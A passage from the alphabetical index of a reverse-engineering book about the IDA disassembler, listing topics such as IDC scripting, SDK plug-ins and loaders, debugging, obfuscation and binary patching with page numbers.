idautils module, 281–282

IDA-View window, 55, 60

idaw.exe, 36

ida-x86emu plug-in, 342, 461–462, 506

.idb extension, 51

.idb files, 229, 504

IDB mode, for Bochs, 575–576

IDB_2_PAT utility, 221

idb_event::byte_patched, 321

idb_event::cmt_changed, 321

IDC command dialog, 255

idc directory, 39

IDC functions, SDK implementation,

586–608

IDC language

error handling in, 258–259

examples, 270–280

emulating assembly language

behavior, 278–280

enumerating cross-references,

272–274

enumerating exported

functions, 275

enumerating functions, 270–271

enumerating instructions,

271–272

finding and labeling function

arguments, 275–277

expressions, 253

functions

code cross-reference, 267

data cross-reference, 268

database manipulation, 268–269

database search, 269–270

dealing with functions, 266–267

disassembly line components, 270

626 INDEX

IDC language (continued)

functions (continued)

file input/output, 264–265

manipulating database

names, 266

reading and modifying data,

262–263

string-manipulation, 264

for user interaction, 263–264

objects, 256–257

persistent data storage in, 259–260

programs, 257–258

SDK cross-reference for, 585–608

statements, 254

variables, 252–253

idc module, 281

IDC script, 455

IDC slices, 253

IDC statements, 553

idc_create_netnode function, 332

idc_func_t datatype, 331

idc_value_t (expr.hpp), datatypes for

SDK, 302, 332

IDC-based loader, 373

idc.idc file, 257

Identical Functions, PatchDiff2, 486

Identifier search, 99

IDP_INTERFACE_VERSION constant, 316

idp.def file, 404

idp.hpp file, 292, 400

ids directory, 39

IDS files

augmenting information for

functions, 230–233

IDA parlance, 39

ids hierarchy, 231

IDS utilities, 228-229

idsnames file, 233

idsutils, 229

.idt file, 275

.idt generator script, 283

Ignore instructions/data definitions

option, Strings window, 71–72

IMAGE_DOS_HEADER structure,

152–154, 350

IMAGE_NT_HEADERS structure, 152–154,

350, 352

IMAGE_SECTION_HEADER structure, 352

IMAGE_SECTION_HEADER template, 352

ImageBase field, 351

Import REConstruction (ImpREC)

utility, 541

import table, 68

import_node netnode, 294

import_type function, 369

imported functions

editing, 230

obfuscation, anti–static analysis

techniques, 444–448

Imports window, 68–69, 443–444

ImpREC (Import REConstruction)

utility, 541

in instruction, 451

include (INC) files, generating, 243

include directive, 151, 261

include directory, 288

include files, 151

Include in names list option, for

named locations, 104

include statement, 261

indent parameter, 397

INDENTATION option, 202

index function, 222

Index of IDC functions, 252, 261

Indexes radio buttons, 126

inf.mf flag, 400

inheritance hierarchy,

determining, 164

inheritance relationships, in C++,

164–165

init member, for plug-ins, 317

init method, 536

init_loader_options function, 360, 363

initialization, of plug-ins, 320–321

inline constructors, 164

inline functions, 164

Input file option, debugger process

options dialog, 572

Input File options, 47

ins.cpp file, 381

INSERT key, 143, 152, 155

Insert option, 149

insn_t (ua.hpp), datatypes for SDK,

293, 303, 385

install_make.txt file, 289

install_visual.txt file, 326

install_xxx.txt files, 288, 324

installation of 32-bit Python,

IDAPython, 503

INDEX 627

installing, 36–40

32-bit vs. 64-bit, 38

directory layout, 38–40

on Linux, 37–38

on OS X, 37–38

plug-ins, 329–330

and SELinux, 38

on Windows, 36–37

instruction emulator, 380, 460–461

instruction operands, formatting,

112–113

Instruction Pointer (IP), 527

instruction sets, CPU, 286

Instruction Tracing option, Debugger

menu, 526

Instructions constant, 383

instrumentation, detecting, 451–452

int 3 instruction, 439, 523, 564

int get_segm_qty function, 308

int set_segm_name function, 308

int type, 128

integer index, 230

Intel syntax, 9

intel_data function, 398

internal heap implementation, 468

interpreter, for Python byte code, 379

invoke_callbacks function, 400

I/O functions, 292

IP (Instruction Pointer), 527

iret instruction, 435

is_far_jump function, 401

is_sp_based function, 401

is_switch function, 401

iscode member, 313

IsDebugged field, PEB, 556

IsDebuggerPresent function, 452,

468, 556

isLoaded function, 262, 263, 304

Items on line attribute, 125

iteration techniques, using API,

310–314

enumerating cross-references,

311–314

enumerating functions, 310

enumerating structure

members, 311

iTERM, 194

itype field, 386

j suffix, 171

ja instruction, 418

Java byte code, 379

Java Database Connectivity

(JDBC), 505

Java loader, 372

Java virtual machine, 472

JDBC (Java Database

Connectivity), 505

jmp esi instruction, 492

jmp esp instruction, 492–493

jmp statement, 10

Jump command, 477

jump flow type, 62, 171

Jump function, 263, 264, 428

jump tables, compiler differences for,

416–420

Jump to Address command, 477

Jump to Address dialog, 82

Jump To Cursor button, x86emu

Emulator dialog, 464

Jump to Next Position option, 83

Jump to Previous Position

operation, 82

Jump to Problem command, 204

JumpQ option, 204

jump-style cross-references, 171

jumpto function, 305

junk strings, 71

jz instruction, 436

Kernel Options, 46, 115

kernel32_GetCommandLineA, 552

kernel32_VirtualAlloc function,

578–579

kernel32.dll, 446, 448, 520, 546,

552, 559

kernwin.hpp, for API, 292

key file, safeguarding, 34

keyboards

different layouts, 194

zoom control, 62

Kiel OMF 166 object files, 219

konsole, KDE’s, 193

Koret, Joxean, 508

628 INDEX

-L option, 23

label component, 338

launching, 44–48

debugger, 514–518

Go button, 45

New button, 44

Previous button, 45

process, 517

Windows installer, 36

ldd (list dynamic dependencies)

utility, 22–23

ldr directory, for SDK, 288

LDRF_RELOAD flag, 359

LDSC (loader description) object, 359

leave instruction, 93, 408

legacy mode graphs, 193

len function, 283

letter codes, 21

Levine, John R., 22

lib directory, for SDK, 288

libbfd (Binary File Descriptor

library), 24

libc_FreeBSD80.exc file, 222

libc_FreeBSD80.pat file, 220

libc_start_main function, 423–424, 427

libc.a version, 213

Library func attribute, 117

library handle, 468

Library name column, FLIRT signa-

ture selection, 214

license agreement dialog, 197

license enforcement, 32

licenses, for IDA, 33

life cycle, of plug-ins, 318–319

limitations

of consoles, 190

of IDA freeware 5.0, 582

line prefixes, enabling, 63

Line prefixes option, 110

linear sweep disassembly, 9–10

lines.hpp file, 292, 395

link libraries, 343

linking, 22

linput_t (loader input type), 359

Linux

based IDA installation, 193

console mode for, 192–194

console mouse server for, 192

installing on, 37–38

terminal programs on, 192

text display in, 192

linux_server server component, 570

linux_serverx64 server component, 570

list dynamic dependencies (ldd)

utility, 22–23

list_callers function, 313

listing view, 55

listing-style display, 55

Litchfield, David, 493

little-endian, CUP, 10

lnames data member, 402

Load a New File dialog, 46

Load Desktop command, 57

Load desktop option, Windows

menu, 209

Load from file radio button, x86emu

Set Memory Values dialog, 465

Load type library option, in Type

Libraries window, 75

load_file function, 359, 372, 410

load_pcap_file function, 369–370

load_simpleton_file, 363

loader description (LDSC) object, 359

loader input type (linput_t), 359

loader modules, for binary files

overview, 358

pcap loader, 366–372

simpleton loader, 361–366

writing using SDK, 358–360

Loader segment checkbox, Change

segment attributes dialog, 543

Loader segments button, Memory

snapshot confirmation

dialog, 542

loader warnings, 49

LOADER_EXT variable, 366

loader_failure function, 359

loader_t structure, 292, 358

loader-generated informational

messages, 49

loader.hpp file, 292, 316, 358

loaders directory, 39, 45

loadfile function, 265

loading files, 45–47, 155

Loading Offset field, 46

loading process, 358

Loading Segment field, 46

loadint utilities, 233–235

INDEX 629

loadint57.zip version, 233

LoadLibrary function, 445–446, 550

LoadLibraryA function, 447, 468

Local Bochs debugger, 575

local debugging, 517

Local name option, for named

locations, 104

Local Types command, 149

Local Types entry dialog, 150

Local Types window, 149–150

local variables

layout, in stack frames, 89

naming, 102–103

Local variables area attribute, 116

locations, renaming, 104

LocByName function, 267, 274

LocByNameEx function, 266

lodsb instruction, 458

Log if same IP option, Tracing

Options dialog, 527

logical addresses, 242

loopne instruction, 10

lowercase letter codes, 21

LPH struct, 380, 385

lpSubKey parameter, 229

lread4bytes function, 362

LST files, generating, 243

ltoa function, 264

Mac keyboard, vs. PC keyboard, 194

mac_server server component, 570

mac_serverx64 server component, 570

Machine field, 351

machine languages, 4, 111

Mach-O loader, 410

MackT, 541

MACRO keyword, 207

macros, 206–207, 249

magic files, 16

magic numbers, 16

main method, compiler differences

for, 421–428

Main toolbar, turning off, 208

make files, plug-ins, 500

Make imports section option, 244

make_data notification, 401

MakeByte function, 269

MakeCode function, 268

makecode parameter, 364

MakeComm function, 269

MakeFunction function, 269

MakeLine function, 395, 397

MakeNameEx function, 266

MakeStr function, 269

MakeUnkn function, 268

malicious PDF files, 509

malloc function, 66, 134, 477

malware analysis, reasons for

disassembly, 6

mangled names, 163

manipulating disassembly, 101–126

arrays, attributes for, 124–126

code display options, 109–111

commenting, 106–108

converting data to code (and vice

versa), 119–120

data transformations, 121–124

formatting instruction operands,

112–113

functions, 113–119

naming, 102–105

Manual load option, for file

headers, 152

manually overriding purged bytes, 230

MAP files, generating, 242

mapping, IDA-generated variable

names, 96–97

Mark as autogenerated option, 124

Mark consecutive traced events with

same IP option, Tracing

Options dialog, 527–528

MASM (Microsoft Assembler), 9

master list of structures, 152

Matched Functions, PatchDiff2,

486–487

MAX_NAMES_LENGTH option, 202

Maximum possible size attribute, 125

MAXSTR constant, 586

MD5 value, CollabREate, 505

mem2base function, 370

member_t (struct.hpp), datatypes for

SDK, 303, 307

members array, 311

.memcpy, 274

Memory Organization dialog, 48

Memory snapshot confirmation

dialog, 542

memory usage parameters, 202

630 INDEX

memqty field, 311

memset operation, 430, 495

menu bar, console user interface, 190

Message function, 254, 263, 579

MessageBoxA function, 444

messages

loader-generated informational, 49

restoring hidden, 44

Metasploit project, 493, 496

Micallef, Steve, 35, 289

Microsoft, Patch Tuesday cycle, 476

Microsoft Assembler (MASM), 9

Microsoft Developer Network

(MSDN), 25

Microsoft linker, 404

Microsoft Visual C++ compiler, 114

Microsoft Visual Studio suite, 25

Minimum offset column, 136

MIPS binary, 278

MIPS processor module, 240

Misc tab, color selection dialog, 208

mitigation, of vulnerability, 483

mitigation event, 483

mkidp syntax, 404

mkidp.exe utility, 404

mnemonics, 4

modal dialogs, 174, 337

modeless dialogs, 174, 337

Modify menu item, 520

module directory, for SDK, 288

Modules view, 519

Modules window, 520–521

mouse support, 190

mov instructions, 12, 92, 234

mov statements, 275–276

Move Current Segment

command, 354

move_segm function, 360

movsb instruction, 527

MSDN (Microsoft Developer

Network), 25

MS-DOS 8.3 name-length

convention, 221

MS-DOS EXE loader (dos.ldw), 45

MS-DOS executable file, 18

MS-DOS header structure, 152

MS-DOS stub, 403–405

msfpescan tool, Metasploit project, 493

msg function, 305

mutual ptrace technique, 453

my_func function, 255

MyNav plug-in, 508–509

mynav.py script, 508

MZ magic number, 16, 152

N hotkey, 102–103, 105

-n option (sigmake), 224

-n option (loadint), 234

nalt.hpp file, 294

.nam file, 49

Name conflict dialog, 105

name decoration, 162

Name directive, 231

Name generation area, 123

name mangling, 26, 162–163

Name of function attribute, 115

Name function, 266

name parameter, 308, 364

name-change dialog, 102

NameChars set, 202

NameEx function, 266

named constants, catalog of, 112–113

named licenses, 33

named locations, 103–105

Autogenerated name option, 104

Create name anyway option, 105

Include in names list option, 104

Local name option, 104

Public name option, 104

Weak name option, 105

name-demangling options, 162

name.hpp, 293

name-length convention,

MS-DOS 8.3, 221

names, vs. hyperlinks, 80

Names window, 72–74, 102

naming, 102–105

conventions, Hex-Rays, 501

import table entries, 552

parameters and local variables,

102–103

NASM (Netwide Assembler), 9, 28

navigating disassembly

double-click navigation, 80–81

jump to address, 82

navigation history, 82–83

searching database, 98–100

INDEX 631

navigation band, 54, 443–444

navigation history list, 185

ncol parameter, 336

ndisasm utility, 28

NEF_XXX flags, 359

neflags parameter, 359

negative deltas, 392

netnode class, 259, 293–295, 301

netnode index value, 331

netnode.hpp file, 293–295

netnodenumber member, 294, 296

netnodes, 294–301, 585

creating, 295–297

data storage in, 297–301

deleting, 301

Netwide Assembler (NASM), 9, 28

network attack sessions, 496

network connection, X.25-style, 113

New button, 44

new operator, 159–160

New Project dialog, Visual Studio,

326–327

new vertices, introducing, 64

Newger, Jan, 560

Next Sequence of Bytes option,

Search menu, 100

NextFunction function, 266

nm utility, 20–21

No edge arrow, 62

no operation (NOP) instructions,

240, 494

NO_OBSOLETE_FUNCS macro, 316

nodeidx_t operator, 296

nodes, 168, 187

noGPM option, TVision, 192

nonmodal dialog, 337

nonstandard structures, 142

NOP (no operation) instructions,

240, 494

NOP slides, 494, 496–497

Normal edge arrow, 62

normal flow, 62

notification event, 483

notification of vulnerability, 483

notify field, 399

notify function, 400

NOVICE option, 206

NtContinue function, 567

ntdll_NtQueryInformationProcess

function, 557

ntdll.dll, 546, 557–558, 567

NtGlobalFlags field, PEB, 556–557

NtQueryInformationProcess

function, 557–558

NtSetInformationThread function, 558

NTSTATUS code, 558

NULL pointer, 299

Number of elements attribute, 125

Number of opcode bytes option, 111

NumberOfSections field, 352

o_displ type, 392

o_imm type, 392

o_mem type, 392

o_near type, 392

obfuscated code analysis, 433–474

anti–dynamic analysis techniques,

449–454

detecting debuggers, 452–453

detecting instrumentation,

451–452

detecting virtualization, 449–451

preventing debugging, 453–454

anti–static analysis techniques,

434–449

disassembly desynchronization,

434–437

dynamically computed target

addresses, 437–444

imported function obfuscation,

444–448

targeted attacks on analysis

tools, 448–449

static de-obfuscation of binaries,

454–472

script-oriented, 455–460

x86emu emulation-oriented,

460–472

using debugger with, 543–560

decryption and decompression

loops, 546–550

hiding debugger, 555–560

import table reconstruction,

550–555

launching process, 545–546

overview, 540–541

virtual machine-based, 472–474

obfuscation process, 19, 541

632 INDEX

obfuscators, 540, 548

objdump utility

debugging information, 24

disassembly listing, 24

private headers, 23

section headers, 23

symbol information, 24

object class, 256

object life cycle, in C++, 160–161

objects, in IDC language, 256–257

OEP (original entry point)

recognition, 540

Offset column, 90

offset cross-reference, 172–173

OllyDbg, 540

OllyDump, 541

OMF libraries, 219

op_t (ua.hpp), datatypes for SDK, 293,

303, 387

opcode bytes, 202

opcodes (operation codes), 4

Open command, file loading, 45

Open Register Window menu

item, 520

Open Subviews command, 57, 521

Open Subviews menu, 55, 60, 191

OpenRCE, 35, 280, 453, 499

OpenSSL cryptographic library,

215–216, 229

operand values, 303

operation codes (opcodes), 4

optimization, 428

Options checkboxes, 47

options for constants, formatting, 112

Options menu, Font menu, 519

optype_t constants, 388

OR operation, 458

ord function, 264

ord parameter, 364

ordinal number, 230

ordinary flow type, 62, 170

original entry point (OEP)

recognition, 540

Original value field, 239

OS X

console mode for, 194–196

installing on, 37–38

OS X Mach-O binaries, 24

Other option, IdaPdf, 510

otool utility, 23–24

out function, 395–396

out instruction, 456

out_line function, 396

out_one_operand function, 394, 395, 397

out_register function, 396

out_snprintf function, 395

out_symbol function, 396

out_tagoff function, 396

out_tagon function, 396

out.cpp file, 394

OUTDIR variable, 366

OutLine function, 396

OutMnem function, 395

outop function, 394, 398

output generator, 380

Output window, 56, 60, 66, 469

OutputDebugString function, 546

OutputDebugStringA function, 559–560

outputter, for processor modules,

394–399

OutValue function, 396

overlapping windowing capability,

TVision library, 190

overriding purged bytes,

manually, 230

Overview Navigator, 54, 215

overview navigator, IDA desktop, 54

p suffix, 171

__p__environ library function, 425

-P<password> command-line option, 571

-p<port number> command-line

option, 571

Pack database (Deflate) option, 52

Pack database (Store) option, 52

pack pragma, 136

packed data, restoring from, 53

PaiMei framework, 177

panning, in disassembly window,

62–63

para parameter, 308

parameters

names, formal, 228

naming, 102–103

passing, 255

recognition, automating, 277

Parameters option, debugger process

options dialog, 572

INDEX 633

parsing errors, 258

Pascal directive, 231–232

Pascal-style strings, 71

Password option, debugger process

options dialog, 572

patch application event, 484

patch availability event, 484

Patch Bytes dialog, 238

Patch Program menu, 238–241

changing individual database bytes,

238–239

changing word in database, 239

using Assemble dialog, 239–241

Patch Tuesday cycle, Microsoft, 476

Patch Word dialog, 239

patch_byte funtion, 304

patch_long function, 304

patch_many_bytes function, 304

patch_word function, 304

patchable parameter, 364

PatchByte function, 262, 280, 458, 556

PatchDbgByte function, 556

PatchDiff2, 485–487

graphical function comparison, 487

Identical Functions, 486

Matched Functions, 486–487

Set Match dialog, 486

Set Match feature, 486

Unmatched Functions, 486–487

PatchDword function, 262, 279

patched files, 484

patching binaries, 237–245

after discovering vulnerability,

484–487

Patch Program menu, 238–241

Produce File menu, 241–245

ASM files, 242–243

DIF files, 244

EXE files, 243–244

HTML files, 245

INC (include) files, 243

LST files, 243

MAP files, 242

PatchWord function, 262

PatchXXX functions, 262, 465

pattern files, for FLIRT signature files,

219–221

pattern-matching, 39, 212

pat.txt file, FLAIR, 220

Pause button, toolbar buttons, 522

Pause Process option, Debugger

menu, 516

PC keyboard, vs. Mac keyboard, 194

pcap file format, 366

pcap loader, 366–372

pcap_file_header structure, 366, 369

pcap_types string, 368

pc.cmt file, 234

PDB (Program Database) file, 49

PDF files, 509

PDF Objects window, 510

PE (Portable Executable) format, 8,

19, 45, 224, 410, 545

binaries, Windows, 462

files, Windows, 467

mode, for Bochs, 576–577

signatures, 224

PE Sniffer utility, 19

PE Tools, 18–19

pe_ prefix, 224

pe_*.pat file, 224

pe_gcc.pat file, 224

pe_sections.idc script, 244

pe_vc.pat file, 224

PEB (process environment block),

462, 555–557, 576

PEiD, 19–20

pe.ldw (Windows PE loader), 45

persistent data storage, in IDC

language, 259–260

persistent named objects, 259

personal settings directory, 192

pe.sig file, 421

pfn pointer, 392

ph variable, 292

phrase field, 396

piracy, Hex-Rays stance on, 33

Pistelli, Daniel, 342

PlayStation PSX libraries, Sony, 219

plb.exe parser, 220

plb.txt file, 220

Please confirm dialog, 542

PLT (procedure linkage table), 274

.plt section, 478

plug-in configuration values, Visual

Studio, 328–329

PLUGIN object, 316

PLUGIN_ENTRY function, 344–345

PLUGIN_EXT variable, 366

plugin_file field, 330

634 INDEX

PLUGIN_FIX bit, 318

PLUGIN_FIX flag, 319–320, 329

PLUGIN_KEEP value, 319

PLUGIN_OK value, 319

PLUGIN_PROC bit, 319

PLUGIN_PROC flag, 319–320

PLUGIN_SKIP value, 319

plugin_t class, 292, 316, 344, 359

PLUGIN_UNL flag, 319

PLUGIN_XXX constants, 316

PLUGIN.flags, 318

PLUGIN.init function, 319–320

PLUGIN.run function, 319, 323

PLUGIN.term function, 319, 322

PLUGIN.wanted_hotkey, 331

plug-ins, 315–346, 499–510

building, 324–329

class informer, 506–508

collabREate, 503–506

configuring, 330–331

for debugger, 536–538

directory for, 39, 288

event notification for, 321–322

execution of, 322–324

extending IDC with, 331–333

Hex-Rays, 500–502

IdaPdf, 509–510

IDAPython, 503

ida-x86emu, 506

initialization of, 320–321

installing, 329–330

life cycle of, 318–319

MyNav, 508–509

scripted, 344–346

user interface options for, 333–344

customized forms with SDK,

337–341

with Qt, 342–344

using SDK chooser dialogs,

334–337

Windows-only, 341–342

using during remote

debugging, 574

writing, 316–324

comment member, 317

flags field, 317

help member, 318

init member, 317

run member, 317

term member, 317

version field, 317

wanted_hotkey member, 318

wanted_name member, 318

plug-ins configuration file, 201

Plugins menu, Edit menu, 485, 508

plugins.cfg file, 201, 330

PointerToRawData field, 353, 355

polymorphism, 163

pop instruction, 392, 436

popa instruction, 459, 547–548

popf instruction, 459, 564

pop-up windows, tool tip–style, 129

Port option, debugger process

options dialog, 572

Portable Executable (PE) format. See

PE format

positive deltas, 392

POSIX wait function, 454

POSIX-style regular expressions, 99

PR_xxx flags, 385

pragma pack directive, 150

predecessor instruction, 177

Predefined symbols section, 258

Preferences dialog, X11, 196

prefixes, for autogenerated names, 73

Preserve case, 124

preventing debuggers, 453–454

PrevFunction function, 267

Previous button, 45

print function, 263

Print recursion dots, 184

print_type function, 164

printable characters, ASCII, 27

printf function, 87

printf_line function, 397

printf-style format string, 263

Problems window, 76–77

procedure linkage table (PLT), 274

process control tools, 519

process control, with debugger,

521–530

breakpoints, 522–526

stack traces, 528–529

tracing, 526–528

watches, 529–530

process environment block (PEB),

462, 555–557, 576

process image, 541–542

INDEX 635

Process Monitor, 451

Process Options command, Debugger

menu, 571

Process Stalker component, PaiMei

framework, 177

process tracing, 454

ProcessDebugPort function, 557–558

processes, attaching debuggers to,

514–515

ProcessInformation parameter, 557

ProcessInformationClass parameter,

557–558

processor modules

architecture of, 409–411

building, 403–407

customizing existing, 407–409

and Python byte code, 378–379

scripting, 411–412

using SDK, 380–403

analyzer, 385–390

emulator, 390–394

initialization of LPH structure,

381–385

outputter, 394–399

processor notifications, 399–401

processor_t members, 401–403

processor_t struct, 380–381

processor notifications, 321

Processor Options button, 47

Processor options section, 203

Processor Type drop-down menu, 46

PROCESSOR_ENTRY function, 411

processor_t object, 320

processor_t struct, 380–381

processor_t.newprc notification, 402

procs directory, 39, 46

procs file, 403

proctemplate.py, 411

Produce File menu, 241–245

ASM files, 242–243

DIF files, 244

EXE files, 243–244

HTML files, 245

INC (include) files, 243

LST files, 243

MAP files, 242

Produce file submenu, File menu, 177

Program Database (PDB) file, 49

program entry point, 8

programs, in IDC language, 257–258

pro.h, for API, 290, 293

project properties dialog, Visual

Studio, 328

Project Selection dialog,

CollabREate, 505

prologue, of functions, 85

Propagate option, Set Match

dialog, 487

Properties dialog, 66

protected binary, Burneye, 467

pseudocode, Hex-Rays, 502

Pseudocode option, View menu, 500

pseudocode window, 501

ptrace API, 454

Public name option, for named

locations, 104

purchasing IDA, 34

purecall function, 159

Purged bytes attribute, 116–117

Purged bytes field, 230

Push Data button, Set Memory Values

dialog, 465

push instruction, 91, 392

push operations, 86

Push Stack Data dialog, 465

push statements, 275

pusha instruction, 459

pushf instruction, 459, 466

puts function, 181

.pyc files, 378, 393

Python byte code, 378–379

Python function, 481–482

Python interpreter, 378

Python script, 495, 549

Python website, IDAPython, 503

python_data function, 394

PYTHON_LAST constant, 382

QApplication class, 343

qfopen function, 291–292

qfprintf function, 291

qnumber macro, 383

qsnprintf function, 291, 343

qstrlen function, 343

qstrncpy function, 291

qstrXXXX function, 291

636 INDEX

QT namespace, 342–343

Qt port, 176

Qt socket classes, 504

QuickEdit mode, 191

QuickUnpack, 442

Quit action, 205

qwingraph graph viewer, 176

qword field, 140

r value, 98

radio buttons, 339–340

RCE forums, 35, 499

.rdata section, 355, 419

rdtsc instruction, 471–472

read cross-reference, 172

read function, POSIX, 363

readelf utility, 24

readlong function, 265

readshort function, 265

README file, tilib utility, 156

readme.txt file

FLAIR, 219

idsutils, 231

SDK, 287, 380

readstr function, 265

read/write traces, 526

realcvt function, 401

rearranging blocks, in disassembly

window, 64

reasons, for disassembly

compiler validation, 7

debugging displays, 7

malware analysis, 6

software interoperability, 7

vulnerability analysis, 6–7

Rebase Program menu option, 351

Recent Scripts menu option, 250

Recent Scripts window, 250

recoverying source code, 5

recursive descent algorithm, 13

recursive descent disassembly, 11–14

conditional branching

instructions, 11

function call instructions, 12

return instructions, 12–14

sequential flow instructions, 11

unconditional branching

instructions, 11

Recursive option, 183

recvfrom function, 498

Red Hat distributions, 219

redefine process, 436

referenced variables, stack frame

view, 97

references, in C++, 165–166

Refresh memory command, Debugger

menu, 579

reg.cpp file, 383

registry key, Windows, 45

RegNames array, 383

RegOpenKey function, 127, 228–229

regular comments, 107

regular expressions, POSIX-style, 99

relationships, deducing between

classes, 165

relative virtual address (RVA),

351–352

release binaries, vs. debug binaries,

428–430

Remote debugger configuration

dialog, 573–574

remote debugging, 569–574

attaching to remote process,

573–574

exception handling during, 574

using Hex-Rays debugging server,

570–573

using scripts and plug-ins

during, 574

Remove Function Tail option, 115

remove option (qwingraph), 194

Rename and Set Type option, 502

Rename option, context-sensitive

menu, 102

renaming

import table entries, 553

locations, 104–105

renimp.idc script, 552–554

reopening, IDA database files, 52–53

REP prefix, 527

repair option, Database Repair

dialog, 53

repeatable comments, 107–108

reporting bugs, 58

request_COMMAND function, 536

INDEX 637

res->num field, 332

res->set_string, 333

Research & Resources forum,

Hex-Rays, 288

Reset Desktop command, 57

Reset desktop option, Windows

menu, 209

restarting IDA, after crashes, 52–53

restoring

hidden messages, 44

from packed data, 53

ResumeProcess macro, 533

RET instruction, 87

ret instruction, 91, 129

RET N variant, 117

return instructions, 12–14

return statement, 255–256, 466, 537

reversing engineer programs, 5

Rfirst function, 267

RfirstB function, 267

right-click options

constants, 112

data items, 121

and name changing, 102

in Segments window, 74

in Signatures window, 75

in Type Libraries window, 75

right-shift operator (>>), 253, 458

RISC-style architectures, 387

Rnext function, 267

RnextB function, 267

Roberts, J. C., 221

Rolles, Rolf, 378, 473

ROM images, 29, 348

RTCx, 428

RtlUserThreadStart function, 546

RTTI (Runtime Type Identification)

implementations

in C++, 163–164

compiler differences for, 420

RTTICompleteObjectLocator structure, 164

rules, for working with malware in

debugging environment, 543

Run button

exception confirmation dialog, 565

x86emu Emulator dialog, 464

Run command, 521

run function, 333, 536

run member, for plug-ins, 317

Run option, Debugger menu, 516

Run to Cursor button

toolbar buttons, 522

x86emu Emulator dialog, 463, 466

Run to Cursor command, in

Burneye, 467

Run to Cursor option, Debugger

menu, 516

Run Until Return button, toolbar

buttons, 522

run_requests function, 536–537

runtime errors, 258

Runtime Type Identification imple-

mentations. See RTTI imple-

mentations

RunTo function, 532

Rutkowska, Joanna, 451

RVA (relative virtual address),

351–352

-S option (IDA), 197

Sabanal, Paul Vincent, 165

safeguarding key file, 34

sandbox environments, 443

Save Database dialog, 51

Save Desktop command, 57

Save Desktop option, Windows

menu, 519

Save Disassembly Desktop dialog, 209

save_file function, 360, 365

Saved registers attribute, 116

savefile function, 265

ScreenEA function, 263, 272

Script cancellation dialog, 258

script de-obfuscation of binaries,

455–460

script entry dialog, 251

Script File option, File menu, 554

script-based behavior, 576

scripting, 249–284

associating IDC scripts with

hotkeys, 261

for debugger, 530–535

execution of, 250–251

IDAPython, 280–281

IDAPython examples, 282–284

IDC examples, 270–280

emulating assembly language

behavior, 278–280

638 INDEX

scripting (continued)

IDC examples (continued)

enumerating cross-references,

272–274

enumerating exported

functions, 275

enumerating functions, 270–271

enumerating instructions,

271–272

finding and labeling function

arguments, 275–277

IDC functions, 261–270

code cross-reference, 267

data cross-reference, 268

database manipulation, 268–269

database search, 269–270

dealing with functions, 266–267

disassembly line

components, 270

file input/output, 264–265

manipulating database

names, 266

reading and modifying data,

262–263

string-manipulation, 264

for user interaction, 263–264

IDC language, 251–260

error handling in, 258–259

expressions, 253

functions, 254–256

objects, 256–257

persistent data storage in,

259–260

programs, 257–258

statements, 254

variables, 252–253

loaders, 373–375

plug-ins, 344–346

processor modules, 411–412

using during remote

debugging, 574

scripting functions, Hex-Rays, 532

SDK (software development kit),

285–314

API (Application Programming

Interface), 289–314

header files, 290–294

iteration techniques using,

310–314

netnodes, 294–301

SDK datatypes, 302–303

SDK functions, 304

configuring build environment, 289

creating loader modules using,

358–360

creating processor modules using,

380–403

analyzer, 385–390

emulator, 390–394

initialization of LPH structure,

381–385

outputter, 394–399

processor notifications, 399–401

processor_t members, 401–403

processor_t struct, 380–381

directory layout

bin directory, 287

etc directory, 288

include directory, 288

ldr directory, 288

lib directory, 288

module directory, 288

plug-ins directory, 288

top-level directory, 288–289

functions, 587

IDC language cross-reference for,

585–608

implementation, IDC functions,

586–608

installing, 287

support, Hex-Rays, 58

sdk directory, 36

sdk_versions.h file, 293

search features, Search menu, 82

SEARCH_DOWN flag, 270

search.hpp, for API, 293

second-generation languages, 4

section:address portion, 110

SectionAlignment field, 352

SectionAlignment value, 352

SecureCRT, 193

segend function, 401

Segment Configuration dialog, 464

segment_t (segment.hpp), datatypes for

SDK, 293, 302

segment-creation dialog, 353

segmented addresses, 169

segment.hpp file, 293, 307, 353

INDEX 639

Segments button, x86emu Emulator

dialog, 464

Segments window, 74, 543

segstart function, 401

SEH (structured exception handling)

process, 472

Chain plug-in, 566

exceptions, Windows, 565

handlers, 565–566

Select a debugger dialog, 516

Select Command dialog,

CollabREate, 505

Select Debugger option, Debugger

menu, 515–516, 548

SELinux, 38

semaphore, 438

semicolon (;) hotkey, 107

semicolon prefix, used for IDA

comments, 107–108

Sequence of Bytes option, 99, 493

sequential flow instructions, 11

Set Breakpoint option, 463

Set Function Type command, 128, 579

Set Import Address Save Point

option, 470

Set Match dialog

PatchDiff2, 486

Propagate option, 487

Set Match feature, PatchDiff2, 486

Set Match option, 487

Set Memory button, x86emu Emulator

dialog, 464–465

Set Memory Values dialog, 465

Set node color to default option, 186

Set specific options button, 572

Set Video Mode menu option,

Window menu, 191

set_idc_func_ex function, 331

set_idp_options function, 401

set_name function, 306

set_processor_type function, 410

set_reg_val function, 538

set_segm_addressing function, 363

SetArrayLong function, 301

SetArrayString function, 301

SetBptAttr function, 531

SetBptCnd function, 531, 554

SetRegValuefunction, 531

setting function type, 129

Setup Data Types dialog, Options

menu, 121, 144

Setup long names button, 163

Setup option, Strings window, 458

Setup short names button, 163

Setup Strings window, 70–71

shared library, 516

sharing TIL files, 155–156

shell script (#!/bin/sh), 16

shellcode, 29, 495–498

SHIFT-down arrow, 243

SHIFT-up arrow, 243

Shiva ELF obfuscation tool, 453

Shiva process, 454

Shiva program, 434–435, 437, 442

shnames data member, 401

SHOW_SP option, 202

show_wait_box function, 323

SHOW_XREFS option, 202

shr instruction, 458

shrd instruction, 458

Shrink Struct Type option, Edit

menu, 145

sidt instruction, 451

Siemens C166 microcontroller

application, 349

sig directory, 39

.sig file, 214

sigmake documentation file, 221

sigmake.exe utility, FLAIR, 221

sigmake.txt file, 222

signature selection dialog, 214

signature selection, FLIRT, 214

signatures

function type, 229

generating, 39

Signatures Window, 74–75

Signatures window, 74–75

Signed elements option, 126

signed shifts, 458

simple arithmetic instructions, 11

Simpleton file format, 373

simpleton loader, 361–366

simplex method, 230

Simplified Wrapper Interface Genera-

tor (SWIG), IDAPython, 503

Sirmabus, 420, 506

size field, 386

size parameter, 307

640 INDEX

SizeOfRawData field, 354

sizer function, 334

sizer parameter, 334

Skip button, x86emu Emulator

dialog, 463–464

Skochinsky, Igor, 165, 420, 507

slice operator, 253

sockaddr data structure, 69

socket descriptor, 489

SoftIce, 452

software breakpoints, 453, 523,

544, 546

software development kit. See SDK

software interoperability, reasons for

disassembly, 7

Solaris 10 x86 system, 219

solid arrows, 65

Sony PlayStation PSX libraries, 219

sorting alphabetically, in Functions

window, 82

source code recovery, 5

SPARC code, 410

